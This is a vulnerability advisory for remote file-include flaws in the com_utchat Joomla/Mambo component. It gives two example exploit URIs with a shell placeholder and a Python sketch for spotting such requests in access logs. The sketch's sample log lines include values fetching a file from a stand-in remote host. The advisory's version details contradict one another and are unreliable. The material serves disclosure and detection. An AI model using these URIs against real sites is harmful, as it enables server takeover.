com_utchat component Mambo and Joomla! Component Multiple Remote File Include Vulnerabilities
BID:30571
Info
| Bugtraq ID: | 30571 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 06 2008 12:00AM |
| Updated: | Aug 27 2008 02:24AM |
| Credit: | by_casper41 |
| Vulnerable: | Yann Sallou com_utchat 0.2 |
| Not Vulnerable: | Yann Sallou com_utchat 1.0 |
Discussion
The com_utchat component for Mambo and Joomla! is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
These issues affect com_utchat 0.9.2; other versions may also be affected.
Exploit / POC
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=[Sh3LL]
http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL]
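A defender can search web-server access logs for requests to the two scripts and parameters named above. The following Python sketch is an added example, not part of the advisory or of com_utchat; it assumes combined-format access logs, and the log lines, addresses and host names in it are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Script path -> query parameter, both taken from the advisory's example URIs.
WATCHED = {
    "/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php": "file",
    "/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php": "aFile",
}
# Values that point a PHP include at a URL wrapper instead of a local file.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
# Client address and request target from a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3}')

SAMPLE_LOG = [  # constructed lines; documentation addresses and host names only
    '192.0.2.10 - - [06/Aug/2008:10:00:01 +0000] "GET /index.php?option=com_utchat HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Aug/2008:10:02:13 +0000] "GET /components/com_utchat/pfc/lib/pear/'
    'PHPUnit/GUI/Gtk.php?file=http://remote.example/s.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [06/Aug/2008:10:02:20 +0000] "GET /joomla//components/com_utchat/pfc/lib/pear/'
    'PHPUnit/GUI/SetupDecorator.php?aFile=hTTp%3A%2F%2Fremote.example%2Fs.txt HTTP/1.1" 200 298',
    '203.0.113.5 - - [06/Aug/2008:10:05:44 +0000] "GET /components/com_utchat/pfc/lib/pear/'
    'PHPUnit/GUI/Gtk.php HTTP/1.1" 200 0',
]


def classify(line):
    """Return (client, script, verdict, value) for a watched request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    raw_path, _, query = target.partition("?")
    # Decode the path and collapse repeated slashes so trivial variants still match.
    path = re.sub(r"/+", "/", unquote(raw_path))
    for suffix, param in WATCHED.items():
        if not path.endswith(suffix):
            continue
        values = parse_qs(query, keep_blank_values=True).get(param, [])
        for value in values:
            if REMOTE.match(value):
                return (client, suffix, "remote-include", value)
        # Assumption: nothing legitimate requests these bundled library scripts directly.
        return (client, suffix, "direct-access", values[0] if values else "")
    return None


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]
```

Access logs record only the request line, so this check covers the query-string form shown in the example URIs and not values sent in a request body or cookie.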
Solution / Fix
Solution:
Updates are available. Please see the references for more information.
Yann Sallou com_utchat 0.2
- Yann Sallou com_utchat_1.0.tar.gz
  http://www.joomlagora.org/index.php/Telecharger-document/4-utChat-0.9.2.html
References
References:
- com_utchat Homepage (Yann Sallou)